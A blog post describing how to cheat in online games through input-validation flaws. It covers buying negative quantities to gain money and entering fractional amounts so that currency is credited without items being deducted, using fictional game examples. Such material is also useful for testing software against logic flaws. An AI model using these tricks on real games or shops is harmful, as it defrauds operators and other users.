Using negative numbers is the easiest way to gain an advantage in a game. It is based on the idea that subtracting a negative number from the product will add the subtraction to the product. Case in point: 2 - -2 = 4. The easiest way to abuse this in a game is to use a buy/sell screen. Most games have a buy/sell feature, although not all are susceptible to negative numbers.

In my fictional game I started out as you do in most games with little money or equipment. My 100 starting coins could only buy me a single healing potion. How boring is that? Luckily the game developers aren't familiar with negative numbers so the first thing I did was buy -1000 potions at 100 coins each. BAM! now I have 100100 coins (100 -(-1000*100)). Enough to buy all the top gear right off the bat.

Decimal points


The abuse of decimals is based around the fact that most games deal in complete numbers (integers) and most calculations performed result in decimal numbers (floating point). Sometimes you will be able to combine multiple decimals to tip the total over, other times you can use decimals to reap the rewards from the magic space between integers. I will give you a simple example:

Cash exchange
In "browsercraft" you can exchange gems for coins. However as you can only possess whole gems the calculation turns your number of gems sold into an integer (discarding decimal points) whilst the gems to coins conversion does not. So after an adventure my barbarian has 5 gems in his possession, each gem can be exchanged for 100 coins each. However, my barbarian will be using decimal points to extract more than the 500 coins it would normally exchange for. When asked how many gems to exchange I enter 0.9 as the amount of gems to exchange. This converts to 0.9 * 100 = 90 coins while subtracting 0 gems from my inventory (the .9 is discarded). Free cash!

There are also several other number techniques that are valuable when playing games. With or without being cheats. If there is enough interest I will write a follow up post where I cover techniques such as:
  • Overflows
  • Underruns
  • Reverse engineering formulas
  • Optimal paths

No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.